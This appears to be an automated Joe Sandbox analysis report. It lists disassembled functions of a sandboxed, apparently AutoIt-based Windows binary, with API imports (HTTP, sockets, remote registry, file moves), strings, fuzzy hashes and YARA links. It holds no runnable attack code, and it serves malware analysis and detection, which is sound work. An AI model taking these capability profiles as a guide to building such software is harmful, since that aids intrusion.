Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: FreeFromProgTask$BlanketConnectConnection2CreateInitializeInstanceOpenProxyQueryRegistrySecurityValuelstrcmpi
String ID: NULL Pointer assignment
API String ID: 1653399731-2785691316
Opcode ID: 069250944c4b5cae8d9ba027fcc4337deb9b93f0114834e2bf5349901f1538a4
Instruction ID: 625df58bd95d38948dccac6df9255e80ee428e84d58e322a5818dc41897b5263
Opcode Fuzzy Hash: 069250944c4b5cae8d9ba027fcc4337deb9b93f0114834e2bf5349901f1538a4
Instruction Fuzzy Hash: 72B1D076A05B419AEB00EF61E8401ADBBB0FB85B98F910135EE4D47BACDF38E545CB50

Function 00007FF7A523CDF0 Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 233COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?,?,?,00000003,00000000,?,00007FF7A523BF47), ref: 00007FF7A523CE29

Strings

cdecl, xrefs: 00007FF7A523CF2F
none, xrefs: 00007FF7A523D05A
stdcall, xrefs: 00007FF7A523CFCB
winapi, xrefs: 00007FF7A523CF88

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: BuffCharLower
String ID: cdecl$none$stdcall$winapi
API String ID: 2358735015-567219261
Opcode ID: 02b910466ee187c44740fa94090c75d71f2fbf299a4025593c27fff920242e11
Instruction ID: 9d243f5328038bb1ca46861e794782a6c7336f1ae511e6ea4187710e2ebc3959
Opcode Fuzzy Hash: 02b910466ee187c44740fa94090c75d71f2fbf299a4025593c27fff920242e11
Instruction Fuzzy Hash: 30910AA3B1661241EA58AF25DC40579A3A0BF56FA0BD24131DE1D637EDDF3DE442D320

Function 00007FF7A5236920 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 212COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32 ref: 00007FF7A523695A
CharUpperBuffW.USER32 ref: 00007FF7A5236A77
VariantClear.OLEAUT32 ref: 00007FF7A5236C11

Part of subcall function 00007FF7A52203E8: VariantInit.OLEAUT32 ref: 00007FF7A5220437
Part of subcall function 00007FF7A52203E8: VariantCopy.OLEAUT32 ref: 00007FF7A5220443
Part of subcall function 00007FF7A52203E8: VariantClear.OLEAUT32 ref: 00007FF7A5220450

Strings

Incorrect Parameter format, xrefs: 00007FF7A5236990, 00007FF7A5236B81
AUTOIT.ERROR, xrefs: 00007FF7A5236A7D

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: Variant$ClearInit$BuffCharCopyUpper
String ID: AUTOIT.ERROR$Incorrect Parameter format
API String ID: 4237274167-1221869570
Opcode ID: 547064277256a578b14e90cf15900b857c5a7bc6aa9a77bb28066ad4bccadfc1
Instruction ID: cf715d6392224afaee98d0cfc282a14846ff805c7097482f90ec3e65c3bee913
Opcode Fuzzy Hash: 547064277256a578b14e90cf15900b857c5a7bc6aa9a77bb28066ad4bccadfc1
Instruction Fuzzy Hash: BC91C166B0AB4285EB15EF61E8401BCB375FB46F98B864432DE4D177A9DF38E405C320

Function 00007FF7A5210EAF Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 187COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 00007FF7A5210EDB

Part of subcall function 00007FF7A5210B90: CharUpperBuffW.USER32(?,?,00000001,00007FF7A5210F61), ref: 00007FF7A5210C6A

Strings

LAST, xrefs: 00007FF7A5210F55, 00007FF7A5210F7E
ACTIVE, xrefs: 00007FF7A5210FBC, 00007FF7A5210FCD
REGEXPTITLE, xrefs: 00007FF7A521105A, 00007FF7A521106F
HANDLE, xrefs: 00007FF7A521100B, 00007FF7A521101C

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: BuffCharForegroundUpperWindow
String ID: ACTIVE$HANDLE$LAST$REGEXPTITLE
API String ID: 3570115564-1994484594
Opcode ID: aa2d75645f71e86a50ff5ca5877f2f0bc66e0fe209def1fa84d7ab904b0cb0e5
Instruction ID: f775bde230c08d1b246ff5a4b1d31cc2e56bee9720f4fc8e28015fa4b0778032
Opcode Fuzzy Hash: aa2d75645f71e86a50ff5ca5877f2f0bc66e0fe209def1fa84d7ab904b0cb0e5
Instruction Fuzzy Hash: 1A71B7A2F0A64341EA65BB75DC012BBE2A1BF56F84FC64031C90D566F9EF3DE5448320

Function 00007FF7A5219898 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 127COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32 ref: 00007FF7A52198EB

Strings

KEYS, xrefs: 00007FF7A5219938
EXISTS, xrefs: 00007FF7A521997B
APPEND, xrefs: 00007FF7A52199BE
REMOVE, xrefs: 00007FF7A52198F1

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: BuffCharUpper
String ID: APPEND$EXISTS$KEYS$REMOVE
API String ID: 3964851224-769500911
Opcode ID: e386f8ab1d92894773db659cf3300b3f053d0d71c47061b204d1c004bb332453
Instruction ID: 04593a6f23fed8e50938f428ed1ba272cd7c05958e76605eba9ed63034becd2c
Opcode Fuzzy Hash: e386f8ab1d92894773db659cf3300b3f053d0d71c47061b204d1c004bb332453
Instruction Fuzzy Hash: B641FBF2F5B61341EA646F259C8013AD2D1BB16FD0B960631CA5E437ECEE3DE9428320

Function 00007FF7A51D9B18 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 121COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7A51D9B56

Strings

E, xrefs: 00007FF7A51D9BF7
O, xrefs: 00007FF7A51D9BFD
#, xrefs: 00007FF7A51D9BEB

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: #$E$O
API String ID: 3215553584-248080428
Opcode ID: d3d7a61e74d4108eabe1bc636e3d6f208025dc38477a0a881e01c4be7aab7093
Instruction ID: e3f4edd4ca79a40bb004a35d8dd8f7e64965128d342c6ba3f254c994d115e561
Opcode Fuzzy Hash: d3d7a61e74d4108eabe1bc636e3d6f208025dc38477a0a881e01c4be7aab7093
Instruction Fuzzy Hash: B0416063A1B65585EF52AF25E8405B9A3A0BB56F88F4A4431EE4D0776CFF3CE441C720

Function 00007FF7A521B62C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 95filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7A521CA34: GetFullPathNameW.KERNEL32 ref: 00007FF7A521CA62

Part of subcall function 00007FF7A521CA34: GetFullPathNameW.KERNEL32 ref: 00007FF7A521CA77

lstrcmpiW.KERNEL32 ref: 00007FF7A521B682
MoveFileW.KERNEL32 ref: 00007FF7A521B6B6
wcscat.LIBCMT ref: 00007FF7A521B744
SHFileOperationW.SHELL32 ref: 00007FF7A521B7A9

Strings

\*.*, xrefs: 00007FF7A521B736

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: FileFullNamePath$MoveOperationlstrcmpiwcscat
String ID: \*.*
API String ID: 3196045410-1173974218
Opcode ID: 19a9c623901bedbfdd4e3d81bd8b065a0a92971c24d4d3071b995089b4c63289
Instruction ID: b8fb089f9005bf99b12e35fbbc10d60661277896e47877ef9bf941c4c138a6a2
Opcode Fuzzy Hash: 19a9c623901bedbfdd4e3d81bd8b065a0a92971c24d4d3071b995089b4c63289
Instruction Fuzzy Hash: FC414276A0568295EB20EB24DC401FEA770FF96B88FD50031DA4D53AAEEF28D549C750

Function 00007FF7A520DF3C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 92windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7A5210730: GetClassNameW.USER32 ref: 00007FF7A521075B

SendMessageW.USER32 ref: 00007FF7A520DFE3
SendMessageW.USER32 ref: 00007FF7A520E000
SendMessageW.USER32 ref: 00007FF7A520E036

Strings

ComboBox, xrefs: 00007FF7A520DF5F
ListBox, xrefs: 00007FF7A520DF9C

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: MessageSend$ClassName
String ID: ComboBox$ListBox
API String ID: 787153527-1403004172
Opcode ID: bcdae5920d2d928eb4967bcf07730aedcb02b36852307e6df1d0eb8a4287a533
Instruction ID: ca5973ad78980590b2358561da7a4d2eeda2cc1fc429608e263d466c0129444d
Opcode Fuzzy Hash: bcdae5920d2d928eb4967bcf07730aedcb02b36852307e6df1d0eb8a4287a533
Instruction Fuzzy Hash: 0D31B5A2B0B64282FA20EB11E8511BAE361FB86F80FC64531DA5D577E9CE3CE545C720

Function 00007FF7A522D914 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 86networkCOMMON

Download Yara Rule

APIs

InternetOpenUrlW.WININET ref: 00007FF7A522D954
HttpSendRequestW.WININET ref: 00007FF7A522D988
HttpQueryInfoW.WININET ref: 00007FF7A522D9D4
InternetCloseHandle.WININET ref: 00007FF7A522DA38

Part of subcall function 00007FF7A522EAB8: GetLastError.KERNEL32 ref: 00007FF7A522EAD4
Part of subcall function 00007FF7A522EAB8: SetEvent.KERNEL32 ref: 00007FF7A522EAE9

Strings

, xrefs: 00007FF7A522D9C1

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
String ID:
API String ID: 3113390036-3916222277
Opcode ID: fe032384e3ae49ab6650df1e9e36687832eb56e7d0293f7a573cd5f7425b5e8f
Instruction ID: 77a2ff5749fbf369fa92a55648ec4234b534d46af5de74674a8959399aa16ac0
Opcode Fuzzy Hash: fe032384e3ae49ab6650df1e9e36687832eb56e7d0293f7a573cd5f7425b5e8f
Instruction Fuzzy Hash: 9B31F8B6A0D78242FB60AF11A814B7EA350FB86F80F995031EE4D13BACDE3DD4028710

Function 00007FF7A52493E8 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 76windowlibraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7A51A932C: CreateWindowExW.USER32 ref: 00007FF7A51A93BC
Part of subcall function 00007FF7A51A932C: GetStockObject.GDI32 ref: 00007FF7A51A93D9
Part of subcall function 00007FF7A51A932C: SendMessageW.USER32 ref: 00007FF7A51A93EC

SendMessageW.USER32 ref: 00007FF7A52494C1
LoadLibraryW.KERNEL32 ref: 00007FF7A52494CE
SendMessageW.USER32 ref: 00007FF7A52494EC
DestroyWindow.USER32 ref: 00007FF7A52494FA

Strings

SysAnimate32, xrefs: 00007FF7A5249460

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
String ID: SysAnimate32
API String ID: 4146253029-1011021900
Opcode ID: 3e4d22fa235855ff4f2554ab96e3220b01af827ee5636b6f724e9c857c26afd0
Instruction ID: 0352617c5bb2620cbce5d7c749caf997812870681a6f44c7423becbbe44c509c
Opcode Fuzzy Hash: 3e4d22fa235855ff4f2554ab96e3220b01af827ee5636b6f724e9c857c26afd0
Instruction Fuzzy Hash: A33153B260A7C1C6E7609F24E84476A73A0FB46B90FA54135DA5907BA8DF3DD444CF10

Function 00007FF7A51C9164 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 29libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32 ref: 00007FF7A51C9184
GetProcAddress.KERNEL32 ref: 00007FF7A51C919A
FreeLibrary.KERNEL32 ref: 00007FF7A51C91BF

Strings

mscoree.dll, xrefs: 00007FF7A51C917B
CorExitProcess, xrefs: 00007FF7A51C9193

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: ec043f9b6fed639492fe08c1f7567e430e68234150a908e2993f018ebf9edeab
Instruction ID: ae48c1383de02c0c9b503c1f3c06d373ca513263c8f5deece1c012aabb4ff522
Opcode Fuzzy Hash: ec043f9b6fed639492fe08c1f7567e430e68234150a908e2993f018ebf9edeab
Instruction Fuzzy Hash: 9BF044A1B1BA4281EE45AF11F885279A3A0EF89F90FC91035E90F467B8DF3DE444C710

Function 00007FF7A51E89B4 Relevance: 7.8, APIs: 5, Instructions: 265COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2f06d0b1d19ede39c94ed452b1c65b617356a11cb49397c7e380f0e2becba314
Instruction ID: 39d73854e6dfa902d338e6a591bc7a84a22e47b281ca172b121d4cea7d6c4970
Opcode Fuzzy Hash: 2f06d0b1d19ede39c94ed452b1c65b617356a11cb49397c7e380f0e2becba314
Instruction Fuzzy Hash: CBA1B663A0A782F7EB226B50E4413B9A691EF42FA4F964635DE1D077E9DF3CD4448320

Function 00007FF7A52345A4 Relevance: 7.8, APIs: 5, Instructions: 250networkCOMMON

Download Yara Rule

APIs

__WSAFDIsSet.WSOCK32 ref: 00007FF7A5234700
#17.WSOCK32 ref: 00007FF7A5234735
WSAGetLastError.WSOCK32 ref: 00007FF7A5234744
inet_ntoa.WSOCK32 ref: 00007FF7A52347E3
htons.WSOCK32 ref: 00007FF7A5234833

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: ErrorLasthtonsinet_ntoa
String ID:
API String ID: 2227131780-0
Opcode ID: bd5e1163d7a9b305c8aebbe74614b584ebe830359c93ecb63b9e7e3e647e6822
Instruction ID: 8f371196b18b65aaa092cb9e99b1c1d9a7e625f8e23684c0e6d1aab24ebb4804
Opcode Fuzzy Hash: bd5e1163d7a9b305c8aebbe74614b584ebe830359c93ecb63b9e7e3e647e6822
Instruction Fuzzy Hash: B2A1D462B0A68282DB15FB26E8542B9A790FF86F94F824531DA4E477FDDE3CE4018750

Function 00007FF7A523E838 Relevance: 7.7, APIs: 5, Instructions: 207COMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32 ref: 00007FF7A523E8EA
OpenProcess.KERNEL32 ref: 00007FF7A523E8FA
GetProcessIoCounters.KERNEL32 ref: 00007FF7A523E931
CloseHandle.KERNEL32 ref: 00007FF7A523EAEE

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: Process$CloseCountersCurrentHandleOpen
String ID:
API String ID: 3488606520-0
Opcode ID: 33f71eaf96c05a677f4ff7f9555289fe157d7a24ae1f8fdeb2073595f7ad5bbf
Instruction ID: 95b4d34eabfb7defcee1b992928c3537e3dcc8844baf375229d37b67c764644a
Opcode Fuzzy Hash: 33f71eaf96c05a677f4ff7f9555289fe157d7a24ae1f8fdeb2073595f7ad5bbf
Instruction Fuzzy Hash: CC81AD62B0A69185EB05EF22D8546BDA7A0BB4AFD4F864031DE0E177AADF3CD405C350

Function 00007FF7A51DED08 Relevance: 7.7, APIs: 5, Instructions: 203COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7A51DED4D

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: f29f2ab1c13e66daf1f8c2b4a146e68bdfc50a5cc3b930cf9745f903616afb6d
Instruction ID: a78bd58b4c483902fd0889469a422ec94dc88bcb76e5502e95d2d10a415ca1e7
Opcode Fuzzy Hash: f29f2ab1c13e66daf1f8c2b4a146e68bdfc50a5cc3b930cf9745f903616afb6d
Instruction Fuzzy Hash: 6481A623A1B61285F712BB65E840ABDB7A0BB46F49F824235DD0D167F9CF3CA445C720

Function 00007FF7A52402DC Relevance: 7.7, APIs: 5, Instructions: 159registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7A5241110: CharUpperBuffW.USER32(?,?,?,00000000,?,?,?,00007FF7A523FD7B), ref: 00007FF7A5241143

RegConnectRegistryW.ADVAPI32 ref: 00007FF7A52403E3
RegOpenKeyExW.ADVAPI32 ref: 00007FF7A524043A
RegEnumValueW.ADVAPI32 ref: 00007FF7A52404A3
RegCloseKey.ADVAPI32 ref: 00007FF7A52404F4
RegCloseKey.ADVAPI32 ref: 00007FF7A5240503

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue
String ID:
API String ID: 3451389628-0
Opcode ID: ea71e9f73f70926a53419fade0107dc191ca266b6e1703fbb57f8f6819cd1ab3
Instruction ID: 8156dd705916441ce6b3eaa7eabcffa08f22174b4a79b003bf15b6fedae1e5b5
Opcode Fuzzy Hash: ea71e9f73f70926a53419fade0107dc191ca266b6e1703fbb57f8f6819cd1ab3
Instruction Fuzzy Hash: 60715E72B19A4189EB11EF65D4903FC6770FB86B88F824531DB0D5BAAACF38D145C364

Function 00007FF7A51DE67C Relevance: 7.6, APIs: 5, Instructions: 142fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(00000000,00000010,-00000090,00007FF7A51DEEAF), ref: 00007FF7A51DE6D9
WideCharToMultiByte.KERNEL32 ref: 00007FF7A51DE7B5
WriteFile.KERNEL32 ref: 00007FF7A51DE7DB
WriteFile.KERNEL32 ref: 00007FF7A51DE81A
GetLastError.KERNEL32 ref: 00007FF7A51DE852

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
